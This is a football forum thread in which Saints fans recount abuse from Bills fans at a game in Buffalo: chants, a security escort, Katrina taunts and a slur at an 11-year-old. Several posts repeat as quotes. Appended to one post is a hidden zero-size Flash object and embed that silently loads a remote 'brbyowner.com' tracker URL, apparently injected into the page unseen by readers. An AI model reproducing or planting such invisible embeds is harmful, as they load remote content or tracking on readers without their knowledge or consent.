Pics from Buffalo, etc... (1 Viewer)

I was in section 134 and I had on my #8 Archie jersey. Mosy people were really cool but we did encounter a few who were pretty rude (too much alcohol). Had a great time and overall Bill's fans were really good sports!

Man..I took some serious abuse yesterday! I was in section 127 which I soon realized was a big season ticket holder section and they were not pleased when I walked down the aisle in my Ellis jersey. I was cool with the "A_ _hole" chants and the questioning of my "sexual preference", but a couple losers tried to get pushy on 2 separate occasions. One guy kept trying to shove a Bills hat on my head at half time while I was waiting for a friend to have a cigarette. After asking nicley 2 times, I took his hat and threw it into the crowd. Not smart on my part considering the sea of blue I was in, but I don't like guys getting physical. Luckily, I'm about 6'2" and about 270 lbs or I probably wouldn't have made it back to my seat!

The worst was about 9 minutes into the 1st when security came down and asked me to follow them upstairs. When I got up there, they said they had complaints about my profanity, which was completely bogus. 1st of all, I NEVER curse at games. Too many little ones in the crowds and as a Dad, I find it disrespectful. 2nd, I would not be so dumb as to curse with 75,000 hostile fans around me! I had a good chat with security and just asked that they do there job and recognize that some folks may complain because of my shirt and my "Who Dats", but that is certainly not profane. I was put "on watch" for the rest of the game, but had no other security issues. Crazy stuff!

Funny how quiet everybody was on my way out though!

I saw you there. Too bad that these kind of fans exist. I don't want hear some nonsense about how a few ruin it for 1,000's. Not one Bills fan said anything to the jerk that called my 11 year old son a profane name just for being a Saints fan. And there were 1,000's that acted this same way. Bills fans deserve that team.

I saw you there. Too bad that these kind of fans exist. I don't want hear some nonsense about how a few ruin it for 1,000's. Not one Bills fan said anything to the jerk that called my 11 year old son a profane name just for being a Saints fan. And there were 1,000's that acted this same way. Bills fans deserve that team.

:plus-un2:

My wife and I got a few Katrina comments. Unbelievable! On the way back to the car an idiot Bills fan tried to walk thru me and my Deuce jersey. Lol Fail! When we went up by 10 the place emptied!

Man..I took some serious abuse yesterday! I was in section 127 which I soon realized was a big season ticket holder section and they were not pleased when I walked down the aisle in my Ellis jersey. I was cool with the "A_ _hole" chants and the questioning of my "sexual preference", but a couple losers tried to get pushy on 2 separate occasions. One guy kept trying to shove a Bills hat on my head at half time while I was waiting for a friend to have a cigarette. After asking nicley 2 times, I took his hat and threw it into the crowd. Not smart on my part considering the sea of blue I was in, but I don't like guys getting physical. Luckily, I'm about 6'2" and about 270 lbs or I probably wouldn't have made it back to my seat!

The worst was about 9 minutes into the 1st when security came down and asked me to follow them upstairs. When I got up there, they said they had complaints about my profanity, which was completely bogus. 1st of all, I NEVER curse at games. Too many little ones in the crowds and as a Dad, I find it disrespectful. 2nd, I would not be so dumb as to curse with 75,000 hostile fans around me! I had a good chat with security and just asked that they do there job and recognize that some folks may complain because of my shirt and my "Who Dats", but that is certainly not profane. I was put "on watch" for the rest of the game, but had no other security issues. Crazy stuff!

Funny how quiet everybody was on my way out though!

I was lookin for you, but sounds like you were on the other side of the field. Next time I'm heading to the Hammer I''ll ping you, a buddy of mine is the GM at Slainte. We may do their bus trip to the Bills/Dolphins game in November.

:plus-un2:

My wife and I got a few Katrina comments. Unbelievable! On the way back to the car an idiot Bills fan tried to walk thru me and my Deuce jersey. Lol Fail! When we went up by 10 the place emptied!<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4730"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4730" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Great PICs OP. Some fans are just ******s. When we lose, I dont talk to anyone!

I was lookin for you, but sounds like you were on the other side of the field. Next time I'm heading to the Hammer I''ll ping you, a buddy of mine is the GM at Slainte. We may do their bus trip to the Bills/Dolphins game in November.

Definitely do that! I have raised more than a few at Slainte over the years!

I hear ya. Insulting your boy was completely disgusting. I don't care how old you are or how much booze you have in you, there are lines you never cross. Dude was lucky you didn't find him.

Saints fans in attendance, thanks for supporting the team!!! Noncreative insults are one thing, but cursing at an 11 year-old? Unacceptable.

Nothing like a stadium scoreboard shutting up their own fans!!!

Sat by some real jerks who even called my 11 year old son a M**f*er just for being a Saints fan.
That's almost to be expected at an opposing team's stadium, although I could never see myself saying anything that mean, even as a joke.

When we went to Chicago for the NFC Championship the Bears fans told some of my lil' cousins that they wished they would have drowned in Katrina...

We got pelted by snow balls and the like... They actually told us that they used to be cruel to the fans by freezing 9V batteries in ice and throwing those in snow balls, but they Bears Stadium beefed up security so they couldn't do that anymore. Never did they say that is was wrong or they shouldn't do it, just that they couldn't because they didn't want to go to jail or face the consequences.

Just remember that before you say anything like that to a person that visits the dome ahah...

Man, I musta been right next to y'all when you took those pics. Had a good time, and only took a little harrassment from the Buffalo fans. My buddy in the Deuce Jersey had some nasty things said to him by the Buffalo fans behind us, but when I turned around and told them to "relax" they simmered down. I'm no tough guy, and find it silly to fight over an NFL team, I think they were used to talking smack to folks in front without having them turn around.

Last edited:
Being the TV did not show the whole field what was up with our receivers? Was they covered that much?

Yes. They were covered up on most plays and the Bills did a nice job of getting Drew off his game by bringing pressure on the throwing downs.

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Already have an account? Log in here.

Users who are viewing this thread

Back
    Top Bottom